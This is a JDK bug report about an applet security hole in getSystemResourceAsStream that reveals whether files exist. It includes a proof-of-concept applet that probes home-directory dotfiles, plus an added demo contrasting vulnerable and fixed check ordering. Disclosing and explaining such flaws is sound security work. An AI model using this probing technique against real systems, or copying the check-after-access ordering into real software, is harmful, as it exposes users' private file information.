JDK-4062427

Security hole in getSystemResourceAsStream call exposes file existence


    Details

    • Type: Bug
    • Status: Closed
    • Priority: P1
    • Resolution: Fixed
    • Affects Version/s: 1.1.2
    • Fix Version/s: 1.1.4
    • Component/s: core-libs
    • Resolved In Build: 1.1.4
    • CPU: sparc
    • OS: solaris_2.5.1
    • Verification: Not verified

      Description

      The getSystemResourceAsStream call has a security hole that allows an
      applet to learn whether files exist. If a user has "." in their
      CLASSPATH (which is common for developers) and the current directory
      is the user's home directory (common for web browsers launched at
      startup), the probe is quite easy to carry out.

      Here's a sample program. Put "." in your CLASSPATH and cd to your
      home directory. Then run this applet. It will generate a bunch of
      security exceptions, but it will correctly report whether each file
      in the list exists.

      import java.applet.*;
      import java.io.*;

      public class GetResource extends Applet {

          public void init() {
              // Well-known dotfiles that live in a typical home directory.
              report(".cshrc");
              report(".login");
              report(".profile");
              report(".exrc");
              report(".emacs");
          }

          void report(String name) {
              boolean e = exists(name);
              System.err.println(name + ": " + (e ? "yes" : "no"));
          }

          boolean exists(String name) {
              try {
                  InputStream i = ClassLoader.getSystemResourceAsStream(name);
                  // null is only returned when the file was not found.
                  return (i != null);
              } catch (SecurityException ex) {
                  // The security check runs only after the file was found,
                  // so an exception means the file exists.
                  return true;
              }
          }
      }

      The problem is that getSystemResourceAsStream in resource.c checks
      whether the file exists before trying to construct a FileInputStream
      (where the security check is done). Therefore a null return means the
      file doesn't exist, and a thrown SecurityException means the file does
      exist.

      Alan Bishop
      WebTV Networks, Inc.
      ###@###.###
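      The ordering defect described above, as an added stand-alone demonstration
      (not the JDK's resource.c code and not part of the original report): a
      lookup that probes existence before the permission check beside one that
      authorizes first. The `checkRead` stand-in for the SecurityManager and the
      temporary sample file are assumptions of this demo.

```java
import java.io.*;
import java.nio.file.*;

/** Added demo (not JDK code): where the permission check sits relative to the existence probe. */
public class ResourceOrderingDemo {
    /** Stand-in for SecurityManager.checkRead() (assumption: trust is a plain flag here). */
    static void checkRead(boolean trusted, String name) {
        if (!trusted) throw new SecurityException("read denied: " + name);
    }

    /** Mirrors the reported bug: probe existence first, then perform the security check. */
    static InputStream vulnerableLookup(File f, boolean trusted) throws IOException {
        if (!f.exists()) return null;          // untrusted caller observes null here...
        checkRead(trusted, f.getPath());       // ...but SecurityException here: existence leaks
        return new FileInputStream(f);
    }

    /** Fixed ordering: authorize before touching the filesystem at all. */
    static InputStream fixedLookup(File f, boolean trusted) throws IOException {
        checkRead(trusted, f.getPath());       // untrusted caller always stops here
        if (!f.exists()) return null;
        return new FileInputStream(f);
    }

    interface Lookup { InputStream run(File f, boolean trusted) throws IOException; }

    /** Reduce a lookup to what the caller can observe: "null", "stream" or the exception name. */
    static String observe(Lookup l, File f, boolean trusted) {
        try (InputStream in = l.run(f, trusted)) {   // a null resource is legal and simply not closed
            return in == null ? "null" : "stream";
        } catch (SecurityException e) {
            return "SecurityException";
        } catch (IOException e) {
            return "IOException";
        }
    }

    public static void main(String[] args) throws IOException {
        Path dir = Files.createTempDirectory("ordering-demo");
        File present = Files.createFile(dir.resolve(".login")).toFile();  // constructed sample file
        File absent = dir.resolve(".nonexistent").toFile();
        for (File f : new File[] { present, absent }) {
            System.out.printf("%-13s vulnerable=%-18s fixed=%s%n", f.getName(),
                observe(ResourceOrderingDemo::vulnerableLookup, f, false),
                observe(ResourceOrderingDemo::fixedLookup, f, false));
        }
        Files.deleteIfExists(present.toPath());
        Files.deleteIfExists(dir);
    }
}
```

      For the untrusted caller the vulnerable lookup yields null for the absent file and SecurityException for the present one, while the fixed lookup yields SecurityException in both cases, so nothing about the filesystem is revealed.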

      People

      Assignee: rschemersunw Roland Schemers (Inactive)
      Reporter: mmuellersunw Marianne Mueller (Inactive)
